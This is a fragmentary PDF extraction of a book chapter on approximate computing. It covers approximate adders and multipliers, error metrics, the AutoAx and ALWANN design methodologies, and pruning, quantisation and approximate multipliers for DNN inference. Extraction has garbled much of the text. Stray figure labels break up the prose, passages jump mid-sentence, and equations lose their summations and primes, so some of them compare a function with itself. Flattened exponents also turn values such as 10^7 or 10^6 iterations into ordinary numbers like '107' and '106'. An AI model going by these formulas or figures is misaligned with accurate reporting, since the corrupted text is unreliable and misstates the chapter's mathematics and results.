Cross-Layer Methodology for Optimizing DNNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1054
Case Studies for Improving the Energy and Performance Efficiency of DNN Inference . . . 1055
Structured Pruning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1055
Quantization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1057
Hardware-Level Approximations: Impact of Self-Healing and
Nonself-Healing Designs on DNN Accuracy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1058
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1063
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1064
Abstract
Keywords
Approximate Computing
Hardware-Level Cross-Layer
Software-Level
Approximations Approximations
Approximations
(Sections 2 and 3) (Sections 4 and 5)
Layer 2
Layer 3
Arithmetic Components
… in MAC Units
PE PE PE + Library of
x Approximate A0 O0
PE PE PE _ Components A1
Pruned O1
PE PE PE Portion B0
x
MAC O2
Mapping Bitwidth B1
+
(Section 3) Reduction
ules (e.g., adders and multipliers). Then section “Design Methods for Building
Approximate Hardware Accelerators: Case Studies for Error-Tolerant Applications”
presents design methodologies for automatically generating approximate datapaths
for application-specific systems. Section “Cross-Layer Approximations for Error–
Tolerant Applications” presents a cross-layer design flow that integrates software-
level and hardware-level approximations. Toward the end, section “Case Studies for
Improving the Energy and Performance Efficiency of DNN Inference” highlights
the effectiveness of cross-layer approximations for deep learning applications, and
section “Conclusions” concludes the chapter.
This work focuses on approximate arithmetic circuits because they are frequently
used in the key applications relevant for approximate computing. The methods for
functional approximations can be divided into two categories: (1) manual and (2)
automated.
The manual (ad hoc) methods are developed for a specific circuit component.
In this chapter, examples of manual approximation of two key arithmetic circuits
– adders and multipliers – are described. These circuits are widely approximated
because they realize key operations in applications requiring low-power processing.
MACs, although widely employed, are typically approximated by using separate
multiplier and adder units instead of introducing an error to the complex MAC
circuit, and thus these circuits are not discussed in the chapter. Designers of
manually approximated circuits found some regularities in the design and modified
the structure or the truth table of the circuit (Fig. 2a). On the other hand, automated
methods use general-purpose circuit resynthesis and approximation techniques and
enable approximation of arbitrary circuits. These methods start with an original
(exact) circuit and, typically iteratively, modify its structure as shown in Fig. 2.
29 Approximate Computing Architectures 1031
Fig. 2 Examples of two possible approaches for approximation of multiplier: (a) manual, where
a designer found the rules for effectively omitting cells (Mahdiani et al. 2010), and (b) automated
iterative approximation of a multiplier having the best area (A) and worst-case error (WCE)
below 5%
Adders: An adder performs the addition of two binary numbers. Two basic
implementations are (1) ripple-carry adder (RCA), where the carry of each full
adder is propagated to the next full adder, and (2) carry-lookahead adder (CLA),
where several units working in parallel generate three signals (“sum,” “propagate,”
and “generate”) that are employed to quickly generate the carry-in signals. The
CLA has significantly shorter delay than RCA. However, the area and power
dissipation of CLA is larger than RCA. Many approximation principles for the
adders implemented using one of these two schemes have been proposed in the
literature (Jiang et al. 2017). The approximations can be classified into the following
classes:
violated. The don’t care states are iteratively applied to the approximate solution.
These states are accepted if the output of the virtual circuit remains zero for all input
combinations. Thereafter, a traditional don’t care-based optimization technique is
applied.
correct design and an approximate design. These metrics are divided into two
categories. The category of arithmetic errors consists of metrics that compare integer
values of the circuit outputs. The Boolean error metrics are classified as general
errors.
is frequently employed to constrain the approximate circuit to differ from the correct
one by at most a certain margin. Note that a special care must be devoted to the cases
for which the output value of the original circuit is equal to zero, i.e., the cases when
the denominator approaches zero. This issue can be addressed by either omitting test
cases when int (f (x)) = 0 or biasing the denominator by 1. The first approach is
usually employed in the manual approximation methods where the zero results are
accurate (Jiang et al. 2017).
The average-case arithmetic error (also known as MAE) is defined as the sum
of absolute differences in magnitude between the original and approximate circuit,
averaged over all inputs:
emae (f, f ) = 2−n |int (f (x)) − int (f (x))|. (3)
∀x∈Bn
If the expression in the sum is replaced by the equation for relative error distance,
the mean relative error is calculated:
|int (f (x)) − int (f (x))|
emre (f, f ) = 2−n . (4)
int (f (x))
∀x∈B
n
1036 M. A. Hanif et al.
Note that the values produced by absolute error metrics emae and ewce can be
very large. Hence, these values can be expressed as a part of the output range using
division by 2m − 1, i.e., the maximal output value. For example, the worst-case
arithmetic error of 64 for an 8-bit output circuit (e.g., 4-bit multiplier) is equal to
25% error.
In many cases, it is also worth to consider the Hamming distance between f (x)
and f (x). The worst-case Hamming distance, denoted also as bit-flip error (Chen
et al. 2014), is defined as
m
ebf (f, f ) = maxn (f (x) ⊕ f (x))i (6)
∀x∈B
i=1
and gives the maximum number of output bits that simultaneously output a wrong
value. The average number of changed output bits, denoted as the average Hamming
distance, can be expressed as follows:
m
emhd (f, f ) = 2−n (f (x) ⊕ f (x))i . (7)
∀x∈Bn i=0
Quality Evaluation
In the error-metric formulas, the enumeration of all possible input vectors is
employed. For a larger number of inputs n, it is not feasible to enumerate Bn . This
issue can be solved by (a) enumerating a subset of Bn or (b) obtaining the exact
value using a formal verification approach. The formal verification can be performed
by exhaustive simulation (with maximal instruction level of SIMD paralleliza-
tion) (Hrbacek and Sekanina 2014; Mrazek et al. 2018) or some formal verification
technique. These techniques typically construct a virtual miter circuit (consisting
of candidate circuit, golden solution, and comparison circuit). Reduced Ordered
Binary Decision Diagrams (ROBDD) or SAT conjunctive normal form (CNF)
29 Approximate Computing Architectures 1037
Fig. 3 Two types of accelerators: (a) with the irregular structure of fixed Gaussian filter having
ten adders and one subtractor with different levels of approximation and (b) PE array for inference
of neural network having PE employing the same adder and multiplier
Two major types of accelerators are discussed in the following sections. The first
one maps every operation on every single hardware component (Fig. 3a). Typical
examples of such irregular accelerators are image, video, or signal processing filter
pipelines. The automated methodology shown in section “Image and Video Process-
ing Applications” maps the approximate components to the operations. The second
type of accelerator shares the hardware component for multiple operations (Fig. 3b).
The sharing occurs, for example, in neural network inference acceleration. The
layer operations are executed on a PE array where each processing element handles
multiple different convolutions. In this case, additional constraints (e.g., only a few
approximate PE arrays, order of the layers) must be satisfied. However, the structure
of the neural network may be modified simultaneously. The approximation of neural
networks is discussed in section “Deep Neural Networks (DNNs)”.
AutoAx Methodology
To address the approximate component binding problem, the authors proposed the
AutoAx methodology (Mrazek et al. 2019a) that enables fast QoR and hardware cost
29 Approximate Computing Architectures 1039
Model Construction Since the synthesis and simulation are typically very time-
consuming processes, it is intractable to use them to perform the analysis of
hardware cost and QoR for every possible configuration of the accelerator. To
address this issue, construction of two independent computational models is pro-
posed – one for estimating QoR and a second for estimating hardware parameters.
The estimation is based on the parameters of approximate circuits belonging to one
selected configuration.
The models are constructed independently using a suitable supervised machine
learning algorithm (regression problem). The learning process is based on providing
example input–output pairs. In our case, each input–output pair corresponds with a
particular configuration as shown in Fig. 5. One input is represented by a vector X,
29 Approximate Computing Architectures 1041
Fig. 5 Construction of training/testing set for ML model of hardware cost. The X-vector is
extracted from the library (e.g., power, PDP [power–delay product] for HW cost, emae , ewce for
QoR), and the y-value is calculated using synthesis chain
Model-Based Design Space Exploration In this step, the Pareto frontier contain-
ing those configurations that show the best trade-offs between QoR and hardware
cost is constructed. In order to avoid time-consuming simulation and synthesis, the
construction is divided into two stages. In the first stage, the computational models
that were developed in the previous step are used to build a pseudo-Pareto set of
potentially good configurations. In the second stage, based on the configurations
forming the pseudo-Pareto set, a set of approximate accelerators is determined, fully
synthesized, and analyzed by means of a simulator and benchmark data. A real QoR
and real hardware cost is assigned to each configuration. Finally, these real values
are used to construct the final Pareto set.
1042 M. A. Hanif et al.
Although the first step reduced the number of possible configurations, the
number of combinations may still be enormous especially for complex problems
consisting of tens of operations. Therefore, the authors proposed an iterative
heuristic algorithm (Algorithm 1) to construct the pseudo-Pareto set. The algorithm
is a variant of stochastic hill climbing which starts with a random configuration
(denoted as P arent), selects a neighbor at random (denoted as C), and decides
whether to move to that neighbor or to examine another. The neighbor configuration
is derived from P arent by modifying a randomly chosen item of the configuration
(i.e., another circuit is picked from the library for a randomly chosen operation). The
quality and hardware cost parameters of C (eQoR and eH W ) are estimated by means
of appropriate estimation models. If the estimated values dominate those already
present in Pareto set P , configuration C is inserted to the set, the set is updated
(operation PARETOINSERT), and the candidate is used as the P arent in the next
iteration. In order to avoid getting stuck in a local optimum, restarts are used. If
the P arent remains unchanged for k successive iterations, the P arent is replaced
by a randomly chosen configuration from P . The quality of the resulting Pareto
set depends on the fidelity of the estimation models and on the number of allowed
iterations. The higher fidelity, the better results. The number of iterations depends on
the chosen termination condition. It can be determined by the size of P , execution
time, or the maximum allowed number of iterations.
Results
The results are divided into two parts. Firstly, a detailed analysis of the results for
the Sobel ED is provided to illustrate the principle of the proposed methodology. In
the second part, only the final results are discussed due to the complexity of these
problems and a limited space.
29 Approximate Computing Architectures 1043
Sobel Edge Detector To eliminate irrelevant circuits from the library, a score is
calculated for each circuit in the library. Firstly, the target accelerator is profiled with
a profiler which calculates the PMF Dk for all operations (Fig. 6). Note that add3
(resp. add4 ) has almost identical PMF with add1 (resp. add2 ). Figure 6 shows that
operand values (neighbor pixels) are typically very close. In the plot dealing with
Dadd2 , one can see regular white stripes caused by shifting of the second operand.
Using the obtained probabilities, the W MEDk errors are calculated for all
approximate circuits implementing kth operation. Then the components are filtered
out. The process is guided by area and W MEDk parameters of the isolated
circuits and keeps only Pareto-optimal implementations. At the end of this process,
the number of circuits in reduced libraries is |RLadd1 | = 35, |RLadd2 | = 32,
|RLadd3 | = 37, |RLadd4 | = 33, and |RLsub | = 36.
The next step in the methodology is to construct models estimating SSIM and
hardware parameters using parameters of the circuits belonging to one selected
configuration. The W MED of all employed circuits is employed as the input vector
for the QoR model. For the hardware model, the input vector is power, area,
and delay of all circuits. Several learning engines are compared to identify the
most suitable one for our methodology (1500 configurations for learning and 1500
configurations for testing were randomly generated using the reduced libraries).
The considered learning engines are the regression algorithms from scikit-learn
for Python. Additionally, a naïve models are constructed
tool for area (Ma (C) =
∀c∈C area(c)) and for SSIM (MSSI M (C) = − ∀c∈C W MEDk (c)) to test if
SSIM correlates with the cumulative arithmetic error and if the area correlates with
the sum of areas of all employed circuits. These simple models are also considered
in the comparisons.
Table 1 shows the fidelities for all constructed models when evaluated on the
training and testing datasets. The best result for the testing datasets is provided by a
random forest consisting of 100 different trees. The correlation between estimated
and real area is shown in Fig. 7. The naïve models exhibit unsatisfactory results
1044 M. A. Hanif et al.
Fig. 7 Correlation of estimated area and real area obtained by synthesis tool for the selected
learning engines used in Sobel ED experiment
The quality of the proposed heuristic algorithm that was used for Pareto frontier
construction is evaluated now. Because of a low number of operations in Sobel ED,
all possible configurations derivable from the reduced libraries RLk (i.e., 4.92 · 107
configurations in total) can be evaluated. The proposed algorithm with a reasonable
number of evaluations (105 ) could find the suboptimal solutions that are very close
to the optimal ones. The proposed algorithm found solutions in three orders of
magnitude closer to the optimal than the standard random search.
More Complex Pipelines The methodology was also applied to obtain approx-
imate implementations of two versions of Gaussian image filter (fixed GF and
generic GF). After profiling this accelerator and reducing the library of approximate
circuits accordingly, random forest-based models of QoR and hardware parameters
were created using 4000 training and 1000 testing randomly generated configura-
tions. In the case of fixed GF, the fidelity of the area estimation model is 87% for
hardware parameters and 92% for QoR. The fidelity of both models of generic GF
is 89%. If the synthesis and simulations run in parallel, the detailed analysis of
one configuration takes 10 s on average, and the model-based estimation of one
configuration takes 0.01 s on average.
The Pareto construction algorithm evaluated 106 candidate solutions. On aver-
age, 39 iterations were undertaken to find a new candidate suitable for the Pareto
front.
Table 2 shows the size of the design space after performing particular steps of
the proposed methodology. For example, there are 7.15 · 1063 configurations in
the generic GF design space. The elimination of irrelevant circuits in the library
reduced the number of configurations to 3.75·1023 . The number of configurations is
enormous, and it would take 1017 years to analyze them. In contrast, the construction
of 4000 random solutions for training of the models takes approximately 11 h,
106 iterations of the proposed Pareto construction algorithm employing the models
takes 3 h, and the remaining 1000 configurations are analyzed in 3 h. Finally,
approximately 100 configurations that are Pareto optimal in terms of area, SSIM,
and energy are selected. In total, the proposed approach takes 17 h on a common
desktop. Hypothetically, if the analysis would be used instead of the estimation
model in the Pareto front construction, the analysis of 106 configurations would
take 115 days.
Figure 8 compares resulting Pareto fronts obtained using the proposed method-
ology (orange line), the RS-based Pareto front construction algorithm (blue line),
and the uniform selection approach (black line). The uniform selection approach
Table 2 Size of the design space after performing particular steps of the proposed methodology
# configurations
Application All possible Lib. preprocessing Pseudo-Pareto Final Pareto
Sobel ED 1.96 · 1015 4.92 · 107 335 62
Fixed GF 7.35 · 1034 1.73 · 1016 1166 132
Generic GF 7.15 · 1063 3.75 · 1023 946 102
1046 M. A. Hanif et al.
Fig. 8 Pareto fronts showing best trade-offs between SSIM, area, and energy obtained using three
methods (orange, the proposed method; blue, random search; black, uniform selection) for three
approximate accelerators
The neural networks have come to be an important part not only of supercomputers
but even small embedded systems realizing machine learning on the edge. The
structure of hardware accelerators is different in contrast to the typical signal
processing pipeline introduced in the previous section. The accelerator is organized
as an array of processing elements. An arbitrary approximate component cannot be
assigned to any layer of DNN because the number of the tiles (parts of the PE array)
is limited. A significant proportion of energy is consumed by the computational path
consisting primarily of multiplications (25–50% (Judd et al. 2018)).
29 Approximate Computing Architectures 1047
The energy cost of the computational path can be reduced using approximate
computing because the DNNs exhibit error resilience property. The standard
approach is to assign the approximate components to the layers while considering
PE array construction constraints. The promising alternative approach is to construct
the architecture with approximate components (neural architecture search) (Pinos
et al. 2021), but this approach is computationally intensive. Therefore, the authors
proposed ALWANN methodology (Mrazek et al. 2019b) that assigns the approxi-
mate components with the help of a multi-objective evolutionary algorithm.
ALWANN Methodology
ALWANN requires the following inputs from the user: already trained NN being
subject of the approximation, a library of basic approximate components (adders,
multipliers), and knowledge of the architecture of the final HW accelerator. Two
HW-based architectures (as discussed in the previous section) are considered
in this work: pipelined and power-gated arrays. For simplicity, the MAC units
will be implemented using accurate addition and approximate multiplication, but
approximate addition can be introduced as well in general. Let L = {L1 , L2 , . . .}
be a set of indexes of convolutional layers of NN and M be a set of available
approximate w-bit multipliers. The user should specify the number of different tiles
|T | the accelerator will consist of. Typically, |T | < |L| and w = 8 is sufficient. Each
tile’s NFU consists of the array of the same MAC units. Each layer Li is supposed
to be executed on a single tile Tj .
The method outputs a set of AxNNs (modified original NN together with the
corresponding configuration of the HW accelerator tiles) that are Pareto optimal
with respect to the energy consumption and classification accuracy. The approxima-
tions are introduced to the original NN by replacement of the accurate convolutional
layers by approximate ones together with weight tuning. Considering the structure
of the HW-based accelerator, two tasks are solved simultaneously. The methodology
looks for the assignment of the approximate multipliers to MACs in SA tiles
T = {T1 , T2 , . . .}, i.e., mapping mapT M : T → M, and for the assignment of
the convolutional layers to SA tiles, i.e., mapping mapLT : L → T. The weights in
each layer are updated according to the properties of a particular multiplier assigned
to the tile which computes the output of the layer.
The overall architecture of the proposed framework is shown in Fig. 9. The
framework expects that a fully specified NN is available (typically in protobuf
format). If not already done, the NN is firstly quantized to avoid floating point MAC
operations. The protobuf specification of the quantized NN is then edited, and all
convolutional layers are replaced by approximate ones. This step is necessary to
have the ability to specify which multiplier should be used to calculate the output
of the MACs separately for each layer. To obtain a Pareto set of various AxNNs,
the authors propose to use multi-objective genetic algorithm (NSGA-II) (Deb et al.
2002). The algorithm maintains a population of |P | candidate solutions represented
as a pair (mapT M , mapLT ). The search starts from an initial population which
1048 M. A. Hanif et al.
Fig. 10 Our tool flow for retraining-less approximation of ResNet neural network
et al. 2016) achieves results comparable to AxNNs with all but one approximated
layers. In contrast to that, AxNN with one approximate layer leads to significantly
worse results because of small energy saving. The proposed method provides better
trade-offs between the accuracy and energy consumption in comparison with the
uniform NN architectures reported in the state-of-the-art works.
A bottleneck of the algorithm was the expensive simulation of approximate
multipliers on CPU. Although the multipliers were cached, our single core applica-
tion has 10× lower performance than vectorized accurate multiplication. Since one
inference of full dataset took 54.5 min, 7.5 days were needed for the construction
of the approximate neural network. This problem was addressed in Vaverka et al.
(2020) by employing approximate operations on a GPU. The speed was improved
more than 200×, and the most complex 50-layer NN can be approximated in less
than 2 h on a single GPU.
Overall Results Table 3 gives some parameters of the best AxNNs constructed
using the proposed tool. The following parameters are reported for each network:
relative accuracy and total and relative energy of convolutional operations. The
relative values are calculated with respect to the original quantized (8-bit) ResNet.
The quality of the obtained AxNNs for ResNet-50 is very promising. If a target
application is able to tolerate 1% accuracy drop (from 89.15% to 88.1%), for
example, more than 30% of energy can be saved. The evaluation across different
architectures shows that it is not advantageous to use AxNNs having more than
Table 3 Parameters of selected AxNNs implementing dataset CIFAR-10. The relative values are
compared to accurate 8-bit neural network, and total energy is related to the energy of one accurate
multiplication EM
AxNN Accuracy Relative accuracy Relative energy Total energy [×EM ]
89.15% 100.00% 100.00% 120.27 M
89.30% 100.17% 83.29% 100.17 M
AxResNet-50
Fig. 12 Comparison of proposed AxNNs (crosses) with accurate quantized NNs (points) – the
energy reports the energy of multiplications in the convolutional layers, while Em is energy of one
multiplication. Gray points represent quantized networks that were not approximated (complexity
reduction)
Comparison with State of the Art (SoA) Table 4 compares the proposed approach
with the state-of-the-art approaches for reducing the energy of NNs that have been
evaluated on CIFAR-10 dataset. Table 4 includes reported energy reduction and
accuracy degradation. The requirement for retraining, uniformity of the architecture,
and complexity of NN are also provided. In contrast with multiplier-less multiplica-
tion where only four different architectures were proposed (Sarwar et al. 2018), our
approach allows to find a new design points with high granularity without retraining.
Besides that, our approach enabled the authors to find AxNNs with low energy
exhibiting low accuracy, e.g., <80%. Even these solutions can be beneficial, for
example, as one of initial stages of some progressive chain classifier (Choi and
Venkataramani 2019).
1052 M. A. Hanif et al.
Perforation, etc.)
Multi-/Many-Core Approximate Architecture
(Power, Performance,
Architectural-level
Consolidated Low-
Characterization
…
Approximations (Functional Run-time
Compensation
Approximation, AAc1 AAc2 AAcN
Management
Approximate Caches, etc.) AppxC AppxC AppxC
Low Cost Approximate Cache (AppxC)
Circuit/Device-level
Online Quality
Approximations (Truncation,
Assessment Approximate Main Memory
Voltage Over-scaling, etc.)
DNNs are widely being used in many applications due to their state-of-the-art
performance (LeCun et al. 2015). Studies have shown that they are (to some
extent) resilient to errors in intermediate computations. This property of DNNs can
be exploited through different types of approximations to reduce their execution
cost and enable their deployment on resource-constrained devices. Toward this,
various software-level and hardware-level approximation/optimization techniques
have been proposed. At the software level, pruning and quantization are employed
to reduce the complexity of the network and computations (respectively), and at
the hardware level, customized hardware accelerators and approximate arithmetic
modules are employed (as also shown in section “Deep Neural Networks (DNNs)”).
These techniques can be combined in a systematic manner to achieve high efficiency
gains. Figure 14 presents a cross-layer methodology that combines pruning and
quantization techniques with hardware-level optimizations (Hanif and Shafique
2021). The methodology consists of the following steps:
• Pruning: At the software level, the most effective technique for optimizing
DNNs is pruning. It involves removing the ineffectual weights from the network
to reduce the complexity of DNNs. Based on its effectiveness, the cross-layer
methodology employs pruning as Step 1. An iterative pruning technique is
mainly employed that reduces the number of parameters in multiple iterations,
where each iteration is (optionally) followed by partial retraining to compensate
for the accuracy loss. The weights to be removed are selected based on their
saliency, which can be estimated using L1-norm/L2-norm or by using a complex
back-propagation algorithm. The number of weights removed in each iteration
and the amount of retraining after each iteration are two key hyper-parameters
that can impact the compression and/or accuracy of the resultant network and,
therefore, have to be selected carefully. The iterations are performed till the
accuracy of the network drops below the user-defined accuracy constraint, and
Fig. 14 A cross-layer optimization flow for DNNs (Hanif and Shafique 2021)
29 Approximate Computing Architectures 1055
the network from the second to the last iteration is forwarded to the next step for
further optimization.
• Quantization: The precision of DNN data structures impacts the memory
requirements and the complexity of the computational modules. Quantization
is employed to represent weights and activations using low-precision fixed-point
format. It not only reduces the memory requirements for the inference stage but
also helps in simplifying the hardware modules, e.g., MAC units. Therefore, the
methodology employs quantization in Step 2 to further compress the network and
simplify the logic units at the hardware level. The quantization process can be
coupled with retraining to compensate for the accuracy loss due to quantization
errors in the computations. Moreover, pruning and quantization can also be
combined in a single unified process (Tung and Mori 2018). However, such
methods require sophisticated optimization algorithms to efficiently explore the
combined design space and propose an effective solution.
• Hardware Approximations: Specialized hardware accelerators are used for
energy-efficient processing of data in real-world systems. These accelerators
can be equipped with approximate units to further boost the efficiency gains.
Toward this, Step 3 of the methodology explores the potential of hardware-
level approximations, e.g., functional approximation of adders and multipliers.
This step performs design space exploration of approximate modules to find
the most suitable configurations that offer high efficiency while meeting the
user-defined quality constraints. The step also explores the potential of internal
self-healing modules, as they can offer better error characteristics in case of
vector operations. These approximations can also be coupled with retraining to
partially compensate for the accuracy loss due to approximations.
Structured Pruning
This section highlights the effectiveness of the pruning step (i.e., Step 1 in Fig. 14)
for improving the efficiency of DNN inference. Figure 15 presents the flow
considered in this study for pruning filters/neurons from a pre-trained DNN. The
main steps of the flow are:
1. Given a pre-trained DNN, first, the methodology computes the saliency of each
filter/neuron of the network using a suitable saliency measure, e.g., L1-norm.
2. Then for each layer of the DNN, it creates a copy of the network and removes
x% of the least significant filters/neurons from the layer while keeping all rest of
the layers intact.
3. The methodology then computes the accuracy and compression ratio of each
model and registers them in θ . Note that for fast execution of the methodology,
only a subset of the validation dataset is used to estimate the accuracy.
1056 M. A. Hanif et al.
If validation Yes
User-defined
Accuracy accuracy > AC
Constraint (AC) No
Output the DNN from
the previous iteration
as the output
Fig. 15 The considered structured pruning methodology (Hanif and Shafique 2021)
To show the effectiveness of pruning, the above flow is employed to prune filter-
s/neurons from the LeNet5 and the VGG11 networks, both trained on the Cifar10
dataset. For these experiments, C = 100 − (Accuracy + 4 ∗ Pi / j ∈{all layers} Pj )
is used as the cost function, where Accuracy is the estimated accuracy after pruning
the ith layer and Pi is the number of parameters in the ith layer. For pruning, x is
defined equal to 20, and for fine-tuning during the process, y is defined equal to 2.
The results are presented in Figs. 16a and 17a. It can be seen from the figures that
the methodology helps maintain the accuracy close to its baseline till a significant
29 Approximate Computing Architectures 1057
a b c
80
80
75
70 60
a The quantization level after
65 40
b which the accuracy starts
60 c decreasing rapidly regardless
20
55 of the pruning level
50 0
0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100 4 5 6 7 8 9 10
Fig. 16 Results of structured pruning when applied to the LeNet5 network trained on the Cifar10
dataset (Hanif and Shafique 2021). (a) Impact of structured pruning on accuracy. (b) Impact of
quantization on the accuracy of the models having different compression ratios. The models are
marked in (a)
a c
e
b d
100
Test Accuracy [%age]
100
95
90 Test Accuracy [%age] 80
60 The quantization level
85 b after which the accuracy
a c d
80 40 starts decreasing rapidly
75 e 20 regardless of the amount
of pruning
70 0
0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95100 4 5 6 7 8 9 10
Model Size Reduction [%age] Bit Width
(a) (b)
Fig. 17 Results of structured pruning when applied to the VGG11 network trained on the Cifar10
dataset (Hanif and Shafique 2021). (a) Impact of structured pruning on accuracy. (b) Impact of
quantization on the accuracy of the models having different compression ratios. The models are
marked in (a)
amount of compression, and, after a point, any further compression results in a rapid
decrease in the accuracy. Note that intermediate fine-tuning, i.e., y > 0, is the key
factor for achieving a high compression ratio.
Quantization
To further compress the DNN and to simplify the arithmetic modules in hardware
accelerators, network quantization (i.e., Step 2 in Fig. 14) is applied after pruning.
For this study, post-training quantization approach with uniform bit-width across
the network is considered, for both weights and activations. To quantize the weights
of a layer, the following equations are employed:
2n−1 − 1
f loor(log2 ( ))
<l>
Wscale =2 max(abs(W <l> ))
1058 M. A. Hanif et al.
where W <l> is the set of all the weights, Wi<l> is the ith element in W <l> , W <l> ˆ
<l>
represents the set of quantized weights, Wscale is the scale factor, and n is the bit-
width.
To quantize the activations, first, the activations are profiled using a set of input
samples, and then the scale factor is defined using the following equation:
⎛ ⎛ ⎞⎞
2n−1 − 1
f loor ⎝log2 ⎝ ⎠⎠
max(abs(A<l> ))
scale = 2
A<l>
Here A<l> is the set of all the logged activations from the input of the lth layer, and
A<l>
scale is the scale factor. During the run-time, the activations are scaled with the
help of following equation:
ˆ = round(A<l> × A<l> )
A<l> (9)
i i scale
where A<l>ˆ represents the quantized activations. Note that W <l> and A<l>
scale scale
are intentionally defined to be in the power of two to simplify the intermediate
conversion operations.
Figure 16b shows the accuracies of five DNNs when exposed to different levels
of quantization. All the DNNs are variants of the same LeNet5 model trained on the
Cifar10 dataset but have different pruning ratios. The baseline models are marked
in Fig. 16a with the help of labels. From the figure, it can be observed that the
networks with high compression ratios are more sensitive to quantization. Moreover,
the accuracy of the networks drops sharply after a specific quantization level. The
same trend is observed for the VGG11 network trained on the Cifar10 dataset (see
Fig. 17). From this analysis, it can be concluded that higher pruning levels are
usually more beneficial than post-training quantization for achieving high overall
compression while maintaining close to the baseline accuracy.
This section analyzes the impact of using approximate arithmetic modules for
internal dot product operations of DNNs on their accuracy. This corresponds to
Step 4 in Fig. 14. For this analysis, modules designed using conventional as well as
self-healing methods are employed. The key distinction between these designs can
be observed from Fig. 18. Figure 18a illustrates a system where the computational
modules are replaced with their approximate variants without considering the
overall computational flow. In such designs, the selection can be based on thorough
design space exploration, but the system is not designed in a manner that the
approximation error of one module is compensated by the error of the other
modules. The self-healing designs exploit the fact that most of the real-world
29 Approximate Computing Architectures 1059
Approximation Healing
Stage Stage
Approximate System Approx.
Input Approx. Approx. Output Module 1a Module 2 Output
Inputs (e.g., performs
Module 1 Module 2 , where
Approx.
Module 1b
Approximation Healing
Stage Stage
Input Module 2
Approx. (e.g., performs
Output
…,
Module 1 where
)
Fig. 18 A comparison of conventional and self-healing approaches (Hanif and Shafique 2021)
LEGEND: a7 a6 a5 a4 a3 a2 a1 a0
ai : ith-bit of operand A x b7 b6 b5 b4 b3 b2 b1 b0
bj : jth-bit of operand B 1 pp07 pp06 pp05 pp04 pp03 pp02 pp01 pp00
ppij : Partial Product of ai and bj pp17 pp16 pp15 pp14 pp13 pp12 pp11 pp10
PO-1 : MSB of the product pp27 pp26 pp25 pp24 pp23 pp22 pp21 pp20
O : Number of output bits – 1 pp37 pp36 pp35 pp34 pp33 pp32 pp31 pp30
M<t> : 2x2 multiplier of type t
pp47 pp46 pp45 pp44 pp43 pp42 pp41 pp40
Extension of Ones for pp57 pp56 pp55 pp54 pp53 pp52 pp51 pp50
Larger Output Widths
pp07 pp66 pp65 pp64 pp63 pp62 pp61 pp60
1 ... 1 pp77 pp76 pp75 pp74 pp73 pp72 pp71 pp70
PO-1 ... P15 P14 P13 P12 P11 P10 P9 P8 P7 P6 P5 P4 P3 P2 P1 P0
(a) An 8-bit multiplier design based on Baugh-Wooley algorithm realized using 2x2 multipliers
Fig. 19 Types of 8 × 8 approximate multipliers considered for simulations (Hanif and Shafique
2021). (a) An 8-bit multiplier design based on Baugh-Wooley algorithm realized using 2 × 2
multipliers. (b) Config. 1. (c) Config. 2. (d) Config. 3. (e) Config. 4. (f) Config. 5. (g) Config. 6.
(h) Config. 7. (i) Config. 8. (j) Config. 9
(i.e., configurations in Fig. 19b–19f), and the configurations that generate both
positive and negative errors represent the self-healing designs (i.e., configurations in
Fig. 19g–19j). The hardware characteristics of all the configurations are presented
in Table 6. The results are generated for 65 nm technology using Cadence Genus
Synthesis tool with TSMC 65 nm library.
To evaluate the impact of approximations on the accuracy of DNNs, functional
models of these approximate multipliers are integrated in a PyTorch-based simula-
tion framework. Figure 21 shows the results obtained when different approximate
29 Approximate Computing Architectures 1061
Fig. 20 The 2 × 2 multiplier designs used for building 8 × 8 approximate multipliers (Hanif and
Shafique 2021). (a) Accurate 2 × 2 multiplier: M<0>. (b) Approximate 2 × 2 multiplier having
3 × 3 → 7: M<1>. (c) Approximate 2 × 2 multiplier having 3 × 3 → 11: M<2>. (d) Approximate
2 × 2 multiplier having 3 × 3 → 5: M<3>. (e) Truth table of M<0>. (f) Truth table of M<1>. (g)
Truth table of M<2>. (h) Truth table of M<3>
1062 M. A. Hanif et al.
Table 5 Error characteristics of the multiplier configurations presented in Fig. 19 (Hanif and
Shafique 2021)
Multiplier configurations
Ax. 1 Ax. 2 Ax. 3 Ax. 4 Ax. 5 Ax. 6 Ax. 7 Ax. 8 Ax. 9
MSE 0.25 9.75 266.25 3102.30 24806.00 7.50 78.00 2128.00 2547.00
MED 0.13 1.13 7.13 23.13 55.13 0.94 3.38 19.94 21.90
Mean error -0.13 -1.13 -7.13 -23.13 -55.13 0.00 0.00 -0.25 -0.13
Table 6 Hardware characteristics of the multiplier configurations presented in Fig. 19 (Hanif and
Shafique 2021)
Multiplier configurations
Accurate Ax. 1 Ax. 2 Ax. 3 Ax. 4 Ax. 5 Ax. 6 Ax. 7 Ax. 8 Ax. 9
Area [cell area] 753 716 696 616 609 571 726 727 672 670
Power [μW] 46.04 44.98 44.92 40.81 40.98 38.96 45.49 45.05 43.48 42.94
Delay [ns] 1.92 1.86 1.73 1.73 1.73 1.73 1.95 1.87 1.73 1.77
PDP [fJ] 88.40 83.66 77.71 70.60 70.90 67.40 88.71 84.24 75.22 76.00
100
Test Accuracy [%age]
80 a
60
b
40
20 c
0
Accurate 1 2 3 4 5 6 7 8 9
Non-Self-healing configurations Self-healing configurations
Multiplier Configuration
Fig. 21 Impact of using approximate multipliers on the accuracy of different pruned variants of
the LeNet5 network (Hanif and Shafique 2021). The considered variants are marked in Fig. 16a
Aggressive approximations
lead to unusual behavior
100
Test Accuracy [%age]
a
80
b
60
c
40
d
20
e
0
Accurate 1 2 3 4 5 6 7 8 9
Non-Self-healing configurations Self-healing configurations
Multiplier Configuration
Fig. 22 Impact of using approximate multipliers on the accuracy of different pruned variants of
the VGG11 network (Hanif and Shafique 2021). The considered variants are marked in Fig. 17a
multiplier configurations (shown in Fig. 19) are used for the LeNet5 network trained
